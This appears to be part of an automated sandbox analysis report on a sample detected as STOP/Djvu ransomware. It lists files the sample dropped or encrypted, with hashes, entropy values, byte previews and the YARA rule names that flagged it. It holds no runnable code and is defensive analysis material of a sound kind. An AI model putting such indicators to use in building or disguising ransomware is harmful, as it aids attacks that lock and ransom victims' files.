                                                                                                                                                                      Preview:..[*W....t.P[...#.g.......T.^F.L........8...h.Cn...N.......}..hF.+Y..._......Z....G...Q...m..r...e*Z.>.DL9..mC...~. .{.Vc>.N...c7.C....|f@...nN..d0P...e|.ii/...._.P..v......b.D.....d.h....xn.@...}c.....C.yi.jgM..w....!}g.....CL.......uI.....w.......S..=,dV..z3(s H...az.........s\=.j_(.[4.k1.._..W=...8.~8..u..D..7...O....Y..k!ZOC.'.*..U.U;L...*1<n.T......R..G..C...M.G..B......k..6..O.z'..Kr...:..m}.f,k...F...Rv../..^.........P.0>..%._C.....ev4..).}...,.>j.M,k..!...+..Y.`e.....P..c.m.D./.....^F.Q3L.mFIjaZ.BbRb7...\:..be....H..o.....=..N-..g.AW>......*p]..%PF....E<.mR~....B..8..X....-..JO.IZB.:.P.{..u..<....|Q.\.J(.(.j..a......M.......j(3..n........J. .5..tI..).l.DC.t..p....@..o..........>..h..9..j..`*.!..x....;r...9,IK[.....h>27..Lg.....S...gD.....4 ..;.;.....:o\h..3...T....e.6.D.{..\..).u.xWY.k....O..Mlm...b...w.!...`....F&]x(..@...T..W.{j..#...i..F...g.|.j.L.0.b{9......_E.B...L.-.:....,........+.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\{02662522-698F-45B5-959E-0EC7B36298AD}.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.963935881177714
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:g8RFI7egUGgfsf8AWrCFBzu4AJlPbD1Q+rIW7jw6+uqJPHolZgyf8v6OJTzMJKGq:gEFI63fsf8AWrCFByvPzDvIec6hiPHoc
                                                                                                                                                                      MD5:7C4DD34C54710A9B3CBDBF1A8628AC5D
                                                                                                                                                                      SHA1:017E2A18B71F3128F6E4BC35BFE768C43801015C
                                                                                                                                                                      SHA-256:5C6C369DB0BD843F51CC92CA7BDCDB09CDBC01667AB0C5CB127E4ACF50695BDC
                                                                                                                                                                      SHA-512:74DB20C3F0BD778E56752DB0D45C5C2368CBC0955ED2DAE1103A329A0001BB7903DF180A12E725CFC523BA13EBFC996EBE4B809F974F6EC9CC900A6BE6046C90
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.p<....-...qj....8.(...U..O.MHV.#................Y.-....s.lT.D.;.._/...];...+.4...m..3Qe..0y-~.^..R.m)...rOt.d.`.y.Q..#.....`.....z3yi.dz./:!k.Al.? ......f.p....._J.(|..d....\....y&..".<E.......+.]uJj...@.G.xlwx..#.-#."...... ... k....X..)...G...ln.............]......Rp...!..=..J....i.n..FQ.....^.^.HL7.[C........$.]..I..._b~?O....-..&.WV......6.}_..$.$...x.(._5...J.@c?..'.1..`.vY`.........@.v....A....5.Rz...[......b..G.F.0."....E.2......?.<|..#O.o...8x. &..9.6.5.^..[:.....^.2eG^.....^OVK..i..#..z.w.)-$3 ".j|.aDE.o...mj...r.E...D.[.:.I..i....7i..)N.l.n...........bDTA2A%.$Z...'W...'H..Kb...H.oA.......G.F.5.>.o...lew.....KN....c.....e..)[#'%..OyG.......9-5t....[...I4. . 5..5...,L..Vv.....}....DS.....$.q.U.q..P...\8..,..*.......u..8.E...\..h}..v..M...A...,3..|./..-...*......w.k.. .....7.. n....d.(N.[....\M...M.f,.g.j...s.....#.T.:i...$.U%.r.C..P)I.p.....*..i..,.#\.........V.a.Z/,X.....R.t_.^whk.q}.55R.J..gL...>^7.$"0.*.....X..S\......6...N.2V.y

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\{139BFC28-947F-45CC-9DE4-AB0FCAEF6E9F}.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.968940637033909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:PD1Yb/eyYeloW76IeAbUNHTAb4Gqvz+AY34m0RvSNhxH1T4x5f+c:P6b/eIUFHz+p0VG1T43Z
                                                                                                                                                                      MD5:9476D6CEBFD82873862A7ACBC0F466D3
                                                                                                                                                                      SHA1:90E9B443D5C9B749BDDCD7E609EACDDF9512D385
                                                                                                                                                                      SHA-256:F92CCFB332EBC70BE561D63E0D171F8539E49C483B15EB89A71CCB53CDAECA82
                                                                                                                                                                      SHA-512:378009B6C09993E4833E85025B3A181818C45E0CF50736A4138E25885ED1D079D2427AEE6CD0189996D81589B6E065F42C144ABC029BB6BAAF5CA6C0FE4B1035
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG..n.C.V.M.^.#.E`4!.....Q...3O|.l..U)|.... 7.$...I....W.6.~..D.Y#...|HOv?Z.o..v...J...F.....M.2h&..k.8.R.I._G.]....L..]V....Z..........B..8...x........K.1P.b. .....FaTcz..{....9@8..@.....%8.........w....O.c{..\.Rdp.p...!#...nV9Q<)}._.8.<....Tn.......X....t.u]....).Y..k.../.D)I.+.j.;.9.n.d0...y.3.(...x....3..&..#.X.}..._.z..5.6.)N-b......V*..4.".q.....>-.@..J..z.D..O..5...|....<M.|9#r.S....Vz@. |.o......S.!.o.wZ..3W.6.pU8.an/..V9(..#_.c.*.3.Y.:.}M.0...m,w........t....)..Eo..P!.?..A.c...w.........F..)O...f..T...W.A....u5.]q.>.1..B.)..id.._..7-....S...Kr...."." .....%[@.C..h.p......&..U......j..h..S... .]D..ds,...j.\s.h#^.#.......Dg1.....|o.h..P.t.....W....WM..U..>........-5.V.J...+.yq8k...7....V8..T.I..1..5-v.Y.:..3.ifU..1.)..up.f...]n.K....!.=.(.5Y../.F.{..W..Hi.~7"..5.Dn......*.\..{r....k4..............`....!.$..}YgI...w..V..U=2....$.....Y....5D....V..>..$F.*&,..z.8.....w.z".j...l..;......."L....<...sBH...BT..,.W.p.2zq=..8.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.971488518202093
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:n66e0qcdt/Uf7vywt7LHr3up7Vv0SUUZHT92mHiKrodV:Mcdhuvyk7rrIsSUUZHT92mCaSV
                                                                                                                                                                      MD5:C473DC53B0D72DE51F6F81CC50C9A1A1
                                                                                                                                                                      SHA1:1B385EE28B11D4DE14851414BC27E075D96D8B05
                                                                                                                                                                      SHA-256:A194AED24CC086A5001D29BC2ED51F8F8EE285C2005C57121C7A61AAAE523E61
                                                                                                                                                                      SHA-512:3550B53B519411DEA7376C6EBAF54A5E74587FD952F8743BAC2027FBED87A91A319443D6B7F330044E94D57DB109EC6F2DE25C9E1E773C68FAB3725B0B92D61F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.,....0q...'."d.WU..3x.[Y....7!....$tw..hd..q......g4.*rX......*.7w...N.S..)=u.am~.a.e...A.z......p......[n..h.(...I}St.dcI.=..S.7!....Y..\..@Zu...v.h..Qx).....w...$G........O.D....D.j.]..F;x.=..i..T.d..{.8g.......'.7.c......lkP.E...Q87.N...p..)Sg77..I..`>....q/....*.......r.2...z...a.3.....u.....+....A.\......C.Al.C...\c4...m.HN..q..:Y..%..K.kE..o.92..+.B....GL..l>..]........z].Phg..`.v...o..gGir...uQ....N...m.Z.W..?.../.....H.~c,S...^'<>.9....<<.h...l...d2...\I..#.u.?..T.H.H.......U-E.....P.QyP.$...._x...d:..X.wH.5........5b..dO@4D......e.P^X..EI.O6.Z..o...p..6....&...>..9.N,2.........../..E.....B.P....CqK........c..s(C..&.....g....Q.\W.....X..^.......@. ...n..B.Y+N.&,..N..G:.,.f..X.8)...D....RGs..b(._..0._.r.w.j:>.............#%.U..i. ..m.=yv..YF].-.8q3.c..9.8;c..~WI.i........O.....@....x[..x..,#: W.:..=./D.Y^.w.l1O.X...n.....;.?.DA.....z&.h_....?k..L...uKS...u.U..d.3..%...s..R....P..........e!..yx...>...-.l.-,..<..Q.30...0e/-).k.0Y

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\{5F969F84-5F34-4AF8-8D36-D6D6A1668750}.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.969863558268538
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:dPQr04Lwxvg6A/Mx0hfoBk4jyS/fPg907RnGUB/gOReSLKACOwtzV4Tz128BYmSj:5QrL56A/C/jFXDxjLKesZQ28BYmSj
                                                                                                                                                                      MD5:698C2CB4A3CEFBAD88760EE524A44DA6
                                                                                                                                                                      SHA1:3F76BDEA44DC4C8DF0ACDB5FE8CC0584EC69BCBA
                                                                                                                                                                      SHA-256:1C81AD0998A791F5F21B93D609BE161469488A40FE91C9E79473210826E798F5
                                                                                                                                                                      SHA-512:ED03CE30939D07790E532FA549B78035840D1ABE3D27158AF17126C0CABB84B56F47B315E88B58EDDD3852BF67906FB01DE8E0724EBB51B3968E7D4CBDACE7EF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG........6!...3.@;8W....{.*..h.=.^.b{....![U..P.]..b;..g../9o$......).5.n5...U..N._...#.ken.....(.....'...P.?I..R.u,..d.`c...')..MM%.a.7.....xZ."...z+D...U..c........h-......./q.;.....L...7RK...t!....Ti$O......ke..$.......x.^:.D..S.T.H....Cs...zB.....u7...n........FW.*..=........~7....E.......]u/xB-$n(._.4W..K}...P8.A.(X.....W.E...oF4..p.,.5.V.X%..+.. }.a.Ya.~..]...).t...%s.*...H.^........UC.x;Q.N.S.9^..d.Oa..R..I....~.#(.RJ..jl..Y...F.h..l.3..@q.*..`.Wp....g.v~"1..p.(.....z...u.0!p...h.g...uY...q^-.fB..l2'z.%*.f.h._.~.$Q..l......X.1E......k.....l..K..V....]n.....1..j.,..U6.....+..,.CN..n1m.:..jS..!....p.r..o:T.:...R.Q......<;.."eb......e..Lw"./........(Z...h.vO..Y...-...].\..3.N\M.e..kxG.q...[..Q]...;.h,.?n.MT.#.5o.........`.......FS..&1.&...........B.F..L].;.4z.}.C.X..o.A...e.?"...I...........v.f..Z. ........+....HE,t.s7@..#0=-.. Yo.....C..TI.U.;L...k..b.5.......eM...^...;......O..|(..6...S|.z......UC2Uz.#......^...N..*9....=6..K

                                                                                                                                                                      C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1150976
                                                                                                                                                                      Entropy (8bit):6.657605522788283
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7:F0dwAYZt6C31WeTVRPOhd7Uq7
                                                                                                                                                                      MD5:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      SHA1:C4C3A4650D278F2F8B9BF871C2AE91508FFAE165
                                                                                                                                                                      SHA-256:4AD7B8D228FE32D82B0373CE886F224F47C2E06A59D394C634160C70083B5F32
                                                                                                                                                                      SHA-512:EAEA7FA64C8BEDF0698A12F16871C5A4CAF19F4CE5576765D2D803568C8FE95AE4BEF456C2C72F1591BDA16FCE412850889770A58A5E239E60A31633BFB7D110
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: unknown
                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: ditekSHen
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 86%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l....7.f......+/..*...h....9.m..../.m...a|..Q...a|7.s...a|.......&.n....8.n....#.M...l.........d...a|3.m....6.m...Richl...........PE..L...7..]............................AA............@..........................p............@....................................T...............................,...`...8............................Z..@............................................text............................... ..`.rdata..............................@..@.data...X........d..................@....rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe:Zone.Identifier

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):67138
                                                                                                                                                                      Entropy (8bit):7.997378869456333
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:j7H+nYD14uMJhdmphmh6fokuk9jEEc/w28FQ4D1svHmUj0E:j7H+YDUzmp8QAZNEcMdD1MHfj0E
                                                                                                                                                                      MD5:4F598216E6BD9811C62A121781763518
                                                                                                                                                                      SHA1:22D3E864B795231E9CA206EA2529FAC37679200C
                                                                                                                                                                      SHA-256:7A2C190CBE9AFCC51C651AF21244864A81362D34ECE80649889AEE8E94BCA032
                                                                                                                                                                      SHA-512:5794DE62600A36CC27168FFCF21E5E6981AFB35C04434C72F126576E238D8CF16D43564ADFB12561FC731BD5D24B7F04E67769B32ECC110935AB12C1069BE6A0
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:0......^{V.Qn3n4...A&.|'2N.....6wu.#C?....1...E....fr^..Z.U.....n..T $V.Z..G.`....l...W"|.>..-.C.".{..09../.^.b....pw...6.HE....S6.K....].W-..>?..>...8._..sp..u......A.K........=...@...$.u.]...Q..E:....W.-G9).."..j0@0Nx..7......r.x....\'..g.....D...b.&]....4..M..~Z/...J..2u.)...zI.@i.WH..(..g[b...4..\g.d..2.*5.3Z...N.]SOo..M..@....Wa.oR.9..216......R#P...3.Z]k....y....5...8.........8.M.&.S...&....(.....#.x.E.8M7...NR...)Q...{`f"^..V...J.N./.k..Dx..&A.cH|h.vu%.j.t.e.......g7...`......Y....G.......R.r'N..0Gme.}....p".g......].6.k.O.R...A...?z...:.%.I...9..ni../..|#.D...?TVz.@.".'a2....P..B/...<.J.........7....r....N/.,..,..Wd...8.X..4.x...L.5..2.,...4...q...0...2. ...Y..k.......)..pB.MN?lZ..e.ePo.]h..<'Nt.c+."H?...e.L..+.i...~...........U..b.a}.}.`.`.Z$k...o.k.w.....&N....j...i.E.q..u....t...\.Yp.G[....,c..1.3.J.\m.J....:Y.....O.@$~.!...{.d.). .I...Ho.......72.......z.J.f.#}5.p....+*....b.T.........';.o"..5W..2..'.3...`.Oqk

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1071
                                                                                                                                                                      Entropy (8bit):7.800297610523546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yHNyt29UXbiZE0kF8DSBqKKJFv+Eyn8py/NIo/mEiHqC2bD:yHNyQCXWZEFFwUCR+Eyn8py/LeECsD
                                                                                                                                                                      MD5:21526B47A4F0CAE6560198826D63B8DA
                                                                                                                                                                      SHA1:BF31E76630D2D61DAF3AA1B7934D16FDCE4DB804
                                                                                                                                                                      SHA-256:73409AC982DE7AF5750EEECA032AE5AB5D20C0D6A494E94D13A246BE40DD384A
                                                                                                                                                                      SHA-512:7DA4F490AA529959E15C43682C25C8A517CE7C6D8F52FB251DD02CCA9E1C5AEAB0EC387A845013CA6FAA57D76170CC89241E52B5B57B9F9F20A0187FC4CE2DEB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:0...0c.)..-.e... .x.4@..Q..:....8...`.ZH... />...W..=....*.@h...<l..{...V..I.du.P.......N...5..>.+A..].G?...K)...MZ.I^.....'Flk8W..|Q.<.cG..(....=:.$}.../...S....!........t./.?0..W..(..m)y...ca@^....^.n..q.t..........T...Ca+.[..|Ph...=Q2..t...yQ..F....~.8...bsZ.g.E..K./.4E.r..MZY...'...&..].R.Q.I..*\.DD...T....[..V..:....k.......g.P..`.%$.>..8DWf.(.M50.....Pm0.&.m....~|..'..f3I.B.E...-c....H`...g.....?....7.zf>H.^Q L..).3....z.Z..f.R..s.pJ....n.}^.u|p.B.e...@.....Ulig.....j.. ~V.Q.C..-...T..8a...9(..H...:Y.a.~T".b.Pe5.d]H..,.U....@.++.H.PZ...4.;&./c...u'.kN.Y@.j.......$.`..?..V..^S...`.c....8X.x.:Q.j.p...5..gL........r.|.rR......1v}k.,..!..?[...y....~.d43..z4...`-.'...V.q.....].....N?Dc$..!.v ..}.l...q>.\I..l..-.Vs.n...g%z.../...6.sC...s.p..3.......i....>L%.H.[m..3.........AZ.K....I.U..;-.....jg.p-..5.._.V........|[...v.x......3...G\.cO....<N]O4.-....t........)c..%.%9.!i.W.(..U.....:...p......C+...\..c^...)...m..{..U....-...v.x6.-..mMsRxMU

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):370
                                                                                                                                                                      Entropy (8bit):7.261718912141876
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:Bk+Zixtrq0jUO6gy/yVS48ZQTi9yFNrHxis5D0Y3zP501qLljDI3r0wknIS1WdNX:e+Z+PSKw4EORx01qlI3r9SUdNcii9a
                                                                                                                                                                      MD5:57BF998DA9CDDE5D16E1522BE80098E2
                                                                                                                                                                      SHA1:C645AE3DEEBD033356CAA7EB75B76098FCC6837C
                                                                                                                                                                      SHA-256:552566AA8C248443AAD09933523B37014D6FDEF2B3843D3A3D753124580D24A1
                                                                                                                                                                      SHA-512:89CAE7A352D8008BFB3A65F70CD4C68FC8B049C7E95671A36A4FC0AF18BEC5ECD5C998CF7B0A3633D495C23B8204900BF032B592FCDE796F42D8EC9AABB20BDA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%PDFT.z'..Mo...j......u.0..\..\.~7.e..r...t>Oj.........W........l./..2....=Z%_{.k.4Z....Pu.M...*...w.._J..]..~.+f..A.....@..[....1.... .0H.M.k.'y...C..ey.P.S.y...p...........!eq...=i.Z^.zk~~.~,.r[.[+.....I...7..0]G.=.%V*.]Xh..!eP......@4....P.p....\q.PY.c....7H8.!j...[..%xun#)9.pg..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):388
                                                                                                                                                                      Entropy (8bit):7.304914270460438
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DYKzesR+mpao2agV7ZPcR7Wm3kF3PRNSUdNcii9a:DYKzeq52x1cR7W5hPu2bD
                                                                                                                                                                      MD5:555152DB69B4FD793DD3FB8D3F359C01
                                                                                                                                                                      SHA1:A4E425BDF5AE5F89C07A30D8A1888AAA7E2B3AC0
                                                                                                                                                                      SHA-256:95AE1C7DA1E5797EDAAE46ECB34B4C3DCD35F6992979D982B0C10E038566A169
                                                                                                                                                                      SHA-512:D5C1A02B5F6A19568F92341C07F72C2B2369DA8F598A6941514DCBF9A5A5672760C92BB3E2FB013D8F11201E3ABAD5394CA6F597556A52236812AD339BF3DDC9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%PDFTasm.Vj...9(c1.M...r........1.cI..>f..+...U..~....$.3V.A5...6,..Prm^*.3....KDW/...>.....4.....[N....4......ITE.%..J.>..'..<...W-(......a.%K.y '......k'.0EmJ.......y.R5..L+N.J. /$_.]......-.......$.Tu..X...Zz.......E...6.i;.G...}4...W...Y5uB.|.....t...3.x.&-t<%.2.aY..].A....Zj..K.....&..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):350
                                                                                                                                                                      Entropy (8bit):7.2173365778442795
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6:QIaJKXUWvYE+BoeO+6/yxocLxyDLX21aRrsmq7Se7IZWJylKm/TlnIS1WdNcii9a:QTJyvvl3+UpcLxyDLXRPenqomrWSUdNX
                                                                                                                                                                      MD5:B377459698EDA080069B667A768171C9
                                                                                                                                                                      SHA1:29F35D4488B145BA6E889472E0C3F029D347F13A
                                                                                                                                                                      SHA-256:A05B95841F5450340C78D949411CB652B563E3152AAA8B5CA8C368BD01D4A224
                                                                                                                                                                      SHA-512:B9AF19E99121591D510EB167065CCFFEA7891A54EEE835AE3E9F7BE01AA0E68D3C90B976035E6DFAC4E7E954A65621801422CEC8CCA9FD86D56344C7CB945A6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..j.oz.p.....c;e.....F51.OJ.._..$.Y.b.wm...8.0A.S.y.3Y)rEep_..7.!4...j......6!..?...Cv...2....x._.#....u.M..".n.p.' .....U.a...A9...oN.?Bq....P..]2...47.^..RJg..)#w.8<..q.U...%P9Jxv.z......|.)E..[-...(..u:..W/....q<...$.-t.E3..S..>...\.s.MzZ.k%p.uB.V/.wT..2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1352
                                                                                                                                                                      Entropy (8bit):7.839620154083292
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Nw6hpmXNjp6cIOakmqOtKfZz+HhJPSEUZqq8nTE8ocYz9kmXNB/1O5EAtRXMYIL4:Nw6hpkzOIf1+HhJPSEUZsTR7w18lXMHU
                                                                                                                                                                      MD5:7D70FFAE284652BB55C33F8B8A234421
                                                                                                                                                                      SHA1:AFF43C11587EBB1E7F17B4A47E417378D09984F6
                                                                                                                                                                      SHA-256:7BDB207C7391F335A3B00D344A7B4EA1B259AF0BB12DF1094D308B8912631789
                                                                                                                                                                      SHA-512:4FAC25E68C6FF2A482E6BD2A74659A03C6EC3187737178519FF81080001B943D536B503970DEC6E3F114669887EBAC43A2A98A9A085B4B56A38112B09026A603
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlb.}..R..E&[.X.!.....M@...I*.U.8-cZY.O.......:.a.._..D..........U.0k....#.O=...X.:..........Gy6.Q@...../.F...<4&I.W.....>..5.;..T.fz8....3....9T.....K..&.._<.W..m...rd.}...u.d... H..'q.j..L{(.D.*.....0...#.......<.JE.z..4.hT4%.4..n..5]..Qt~n..3.8.....i..X..%.d..7\l.z....R...^:.H.BE.HH.y.CZ).5.<.f.Hk.[..km..l^..^.;..../..fY|.cP....x.A..ds.m6.}.V/..........$u........~....n.E..F...O.)....V|=9.....]....Vl...v}-$...l7E,.S.%.TD..f).-..u<.\.....jh.. ..b..`...X.......cq...*"..%8..yN...=3.";...........v....?........U.8s.3.k.Zm.X.....M..}0....Z.f%.....?..c!.)0Y..A.....P.%...D..n...4..}...$..W.V3.iFx........X^n~.........\..^L..4;...MO:..'..@$,..LnmE....B.. 1..l...v.K.g.B.f.f..VI.Cia.y..*z.P..N<].....k...q..u:.}<FO.w@6.h.Hn0!.......<.....|.g5F..#..Ag.J...d...t&.......^8...?*.r.%.$.u....._0..Y2)..IB.%.As..L,.u.bB %q.W.})..c.,.}....c'..:..*.L.W_..N....^.,l.......?[+.f....-.B<E....3.=..3t(..h...T.H..}.....@..Mm.....T.x'.../.....C...L.;.la....k..s._.#.

                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2424
                                                                                                                                                                      Entropy (8bit):7.9196043738215485
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:3xN7X9He2IHmk5VBlBnZyACSUDc3+ZeTJEkLMFiwhM1Nj01v0DbfbD:BNBHe2635TgfSUTMaFiwhOjnfX
                                                                                                                                                                      MD5:58FD3A011C2139349B638948365F64DD
                                                                                                                                                                      SHA1:3401E8EA347E4B62BB3124526347CC58F0D2685A
                                                                                                                                                                      SHA-256:79311A18A19589F1BAC61408E595136F3BF341084D01986C6B903A8DD44D8D50
                                                                                                                                                                      SHA-512:16C987595BD990EB1FADE5B8C57AFD22DCC6BA6026ECB5DAE3E9A8074A99F6DF1EF69E8BF41CA30085C10918D7EC08730DA16AB5C0476B8FDD2A4DB3CB4A4A6F
                                                                                                                                                                      Malicious:false
